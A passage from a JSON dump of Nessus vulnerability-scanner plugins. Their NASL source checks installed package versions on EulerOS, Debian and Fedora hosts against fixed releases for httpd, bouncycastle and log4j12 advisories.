value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h8\",\n \"httpd-devel-2.4.6-45.0.1.4.h8\",\n \"httpd-manual-2.4.6-45.0.1.4.h8\",\n \"httpd-tools-2.4.6-45.0.1.4.h8\",\n \"mod_ssl-2.4.6-45.0.1.4.h8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:02:30", "description": "According to the version of the httpd packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-11-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9798"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:httpd", "p-cpe:/a:huawei:euleros:httpd-devel", "p-cpe:/a:huawei:euleros:httpd-manual", "p-cpe:/a:huawei:euleros:httpd-tools", "p-cpe:/a:huawei:euleros:mod_ssl", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/104278", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104278);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-9798\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : httpd (EulerOS-SA-2017-1253)\");\n script_summary(english:\"Checks the rpm output 
for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the httpd packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - A use-after-free flaw was found in the way httpd\n handled invalid and previously unregistered HTTP\n methods specified in the Limit directive used in an\n .htaccess file. A remote attacker could possibly use\n this flaw to disclose portions of the server memory, or\n cause httpd child process to crash. (CVE-2017-9798)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1253\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?97163687\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.0.1.4.h5\",\n 
\"httpd-devel-2.4.6-45.0.1.4.h5\",\n \"httpd-manual-2.4.6-45.0.1.4.h5\",\n \"httpd-tools-2.4.6-45.0.1.4.h5\",\n \"mod_ssl-2.4.6-45.0.1.4.h5\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:44:46", "description": "Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz Institute for IT Security, published a paper in ESORICS 2015 where they describe an invalid curve attack in Bouncy Castle Crypto, a Java library for cryptography. An attacker is able to recover private Elliptic Curve keys from different applications, for example, TLS servers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\nPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Debian DSA-3417-1 : bouncycastle - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bouncycastle", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3417.NASL", "href": "https://www.tenable.com/plugins/nessus/87359", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3417.
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87359);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n script_xref(name:\"DSA\", value:\"3417\");\n\n script_name(english:\"Debian DSA-3417-1 : bouncycastle - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tibor Jager, Jorg Schwenk, and Juraj Somorovsky, from Horst Gortz\nInstitute for IT Security, published a paper in ESORICS 2015 where\nthey describe an invalid curve attack in Bouncy Castle Crypto, a Java\nlibrary for cryptography. An attacker is able to recover private\nElliptic Curve keys from different applications, for example, TLS\nservers.\n\nMore information:\nhttp://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-att\nacks.htmlPractical Invalid Curve Attacks on TLS-ECDH:\nhttp://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802671\"\n );\n # http://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?577fd981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://euklid.org/pdf/ECC_Invalid_Curve.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bouncycastle\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.debian.org/security/2015/dsa-3417\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bouncycastle packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1.44+dfsg-3.1+deb7u1.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1.49+dfsg-3+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bouncycastle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-3.1+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcmail-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 
prefix:\"libbcmail-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpg-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcpkix-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbcprov-java-doc\", reference:\"1.49+dfsg-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:36", "description": "The Bouncy Castle Java library before 1.51 does not validate that a point is within the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve attack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in version 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the backport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-12-09T00:00:00", "type": "nessus", "title": "Debian DLA-361-1 : bouncycastle security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libbcmail-java", "p-cpe:/a:debian:debian_linux:libbcmail-java-doc", "p-cpe:/a:debian:debian_linux:libbcmail-java-gcj", "p-cpe:/a:debian:debian_linux:libbcpg-java", "p-cpe:/a:debian:debian_linux:libbcpg-java-doc", "p-cpe:/a:debian:debian_linux:libbcpg-java-gcj", "p-cpe:/a:debian:debian_linux:libbcprov-java", "p-cpe:/a:debian:debian_linux:libbcprov-java-doc", "p-cpe:/a:debian:debian_linux:libbcprov-java-gcj", "p-cpe:/a:debian:debian_linux:libbctsp-java", "p-cpe:/a:debian:debian_linux:libbctsp-java-doc", "p-cpe:/a:debian:debian_linux:libbctsp-java-gcj", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-361.NASL", "href": "https://www.tenable.com/plugins/nessus/87266", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-361-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87266);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7940\");\n\n script_name(english:\"Debian DLA-361-1 : bouncycastle security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Bouncy Castle Java library before 1.51 does not validate that a\npoint is within the elliptic curve, which makes it easier for remote\nattackers to obtain private keys via a series of crafted elliptic\ncurve Diffie Hellman (ECDH) key exchanges, aka an 'invalid curve\nattack.'\n\nFor Debian 6 'Squeeze', this issue has been fixed in\nversion 1.44+dfsg-2+deb6u1 of bouncycastle.\n\nMany thanks to upstream author Peter Dettmann who reviewed the\nbackport that we prepared.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/12/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/bouncycastle\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcmail-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcpg-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbcprov-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libbctsp-java-gcj\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcmail-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcpg-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbcprov-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif 
(deb_check(release:\"6.0\", prefix:\"libbctsp-java\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-doc\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbctsp-java-gcj\", reference:\"1.44+dfsg-2+deb6u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:54", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "Fedora 24 : log4j12 (2017-7e0ff7f73a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-7E0FF7F73A.NASL", "href": "https://www.tenable.com/plugins/nessus/100745", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-7e0ff7f73a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100745);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-5645\");\n script_xref(name:\"FEDORA\", value:\"2017-7e0ff7f73a\");\n\n script_name(english:\"Fedora 24 : log4j12 (2017-7e0ff7f73a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", 
\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-7e0ff7f73a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected log4j12 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"log4j12-1.2.17-19.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"log4j12\");\n}\n", 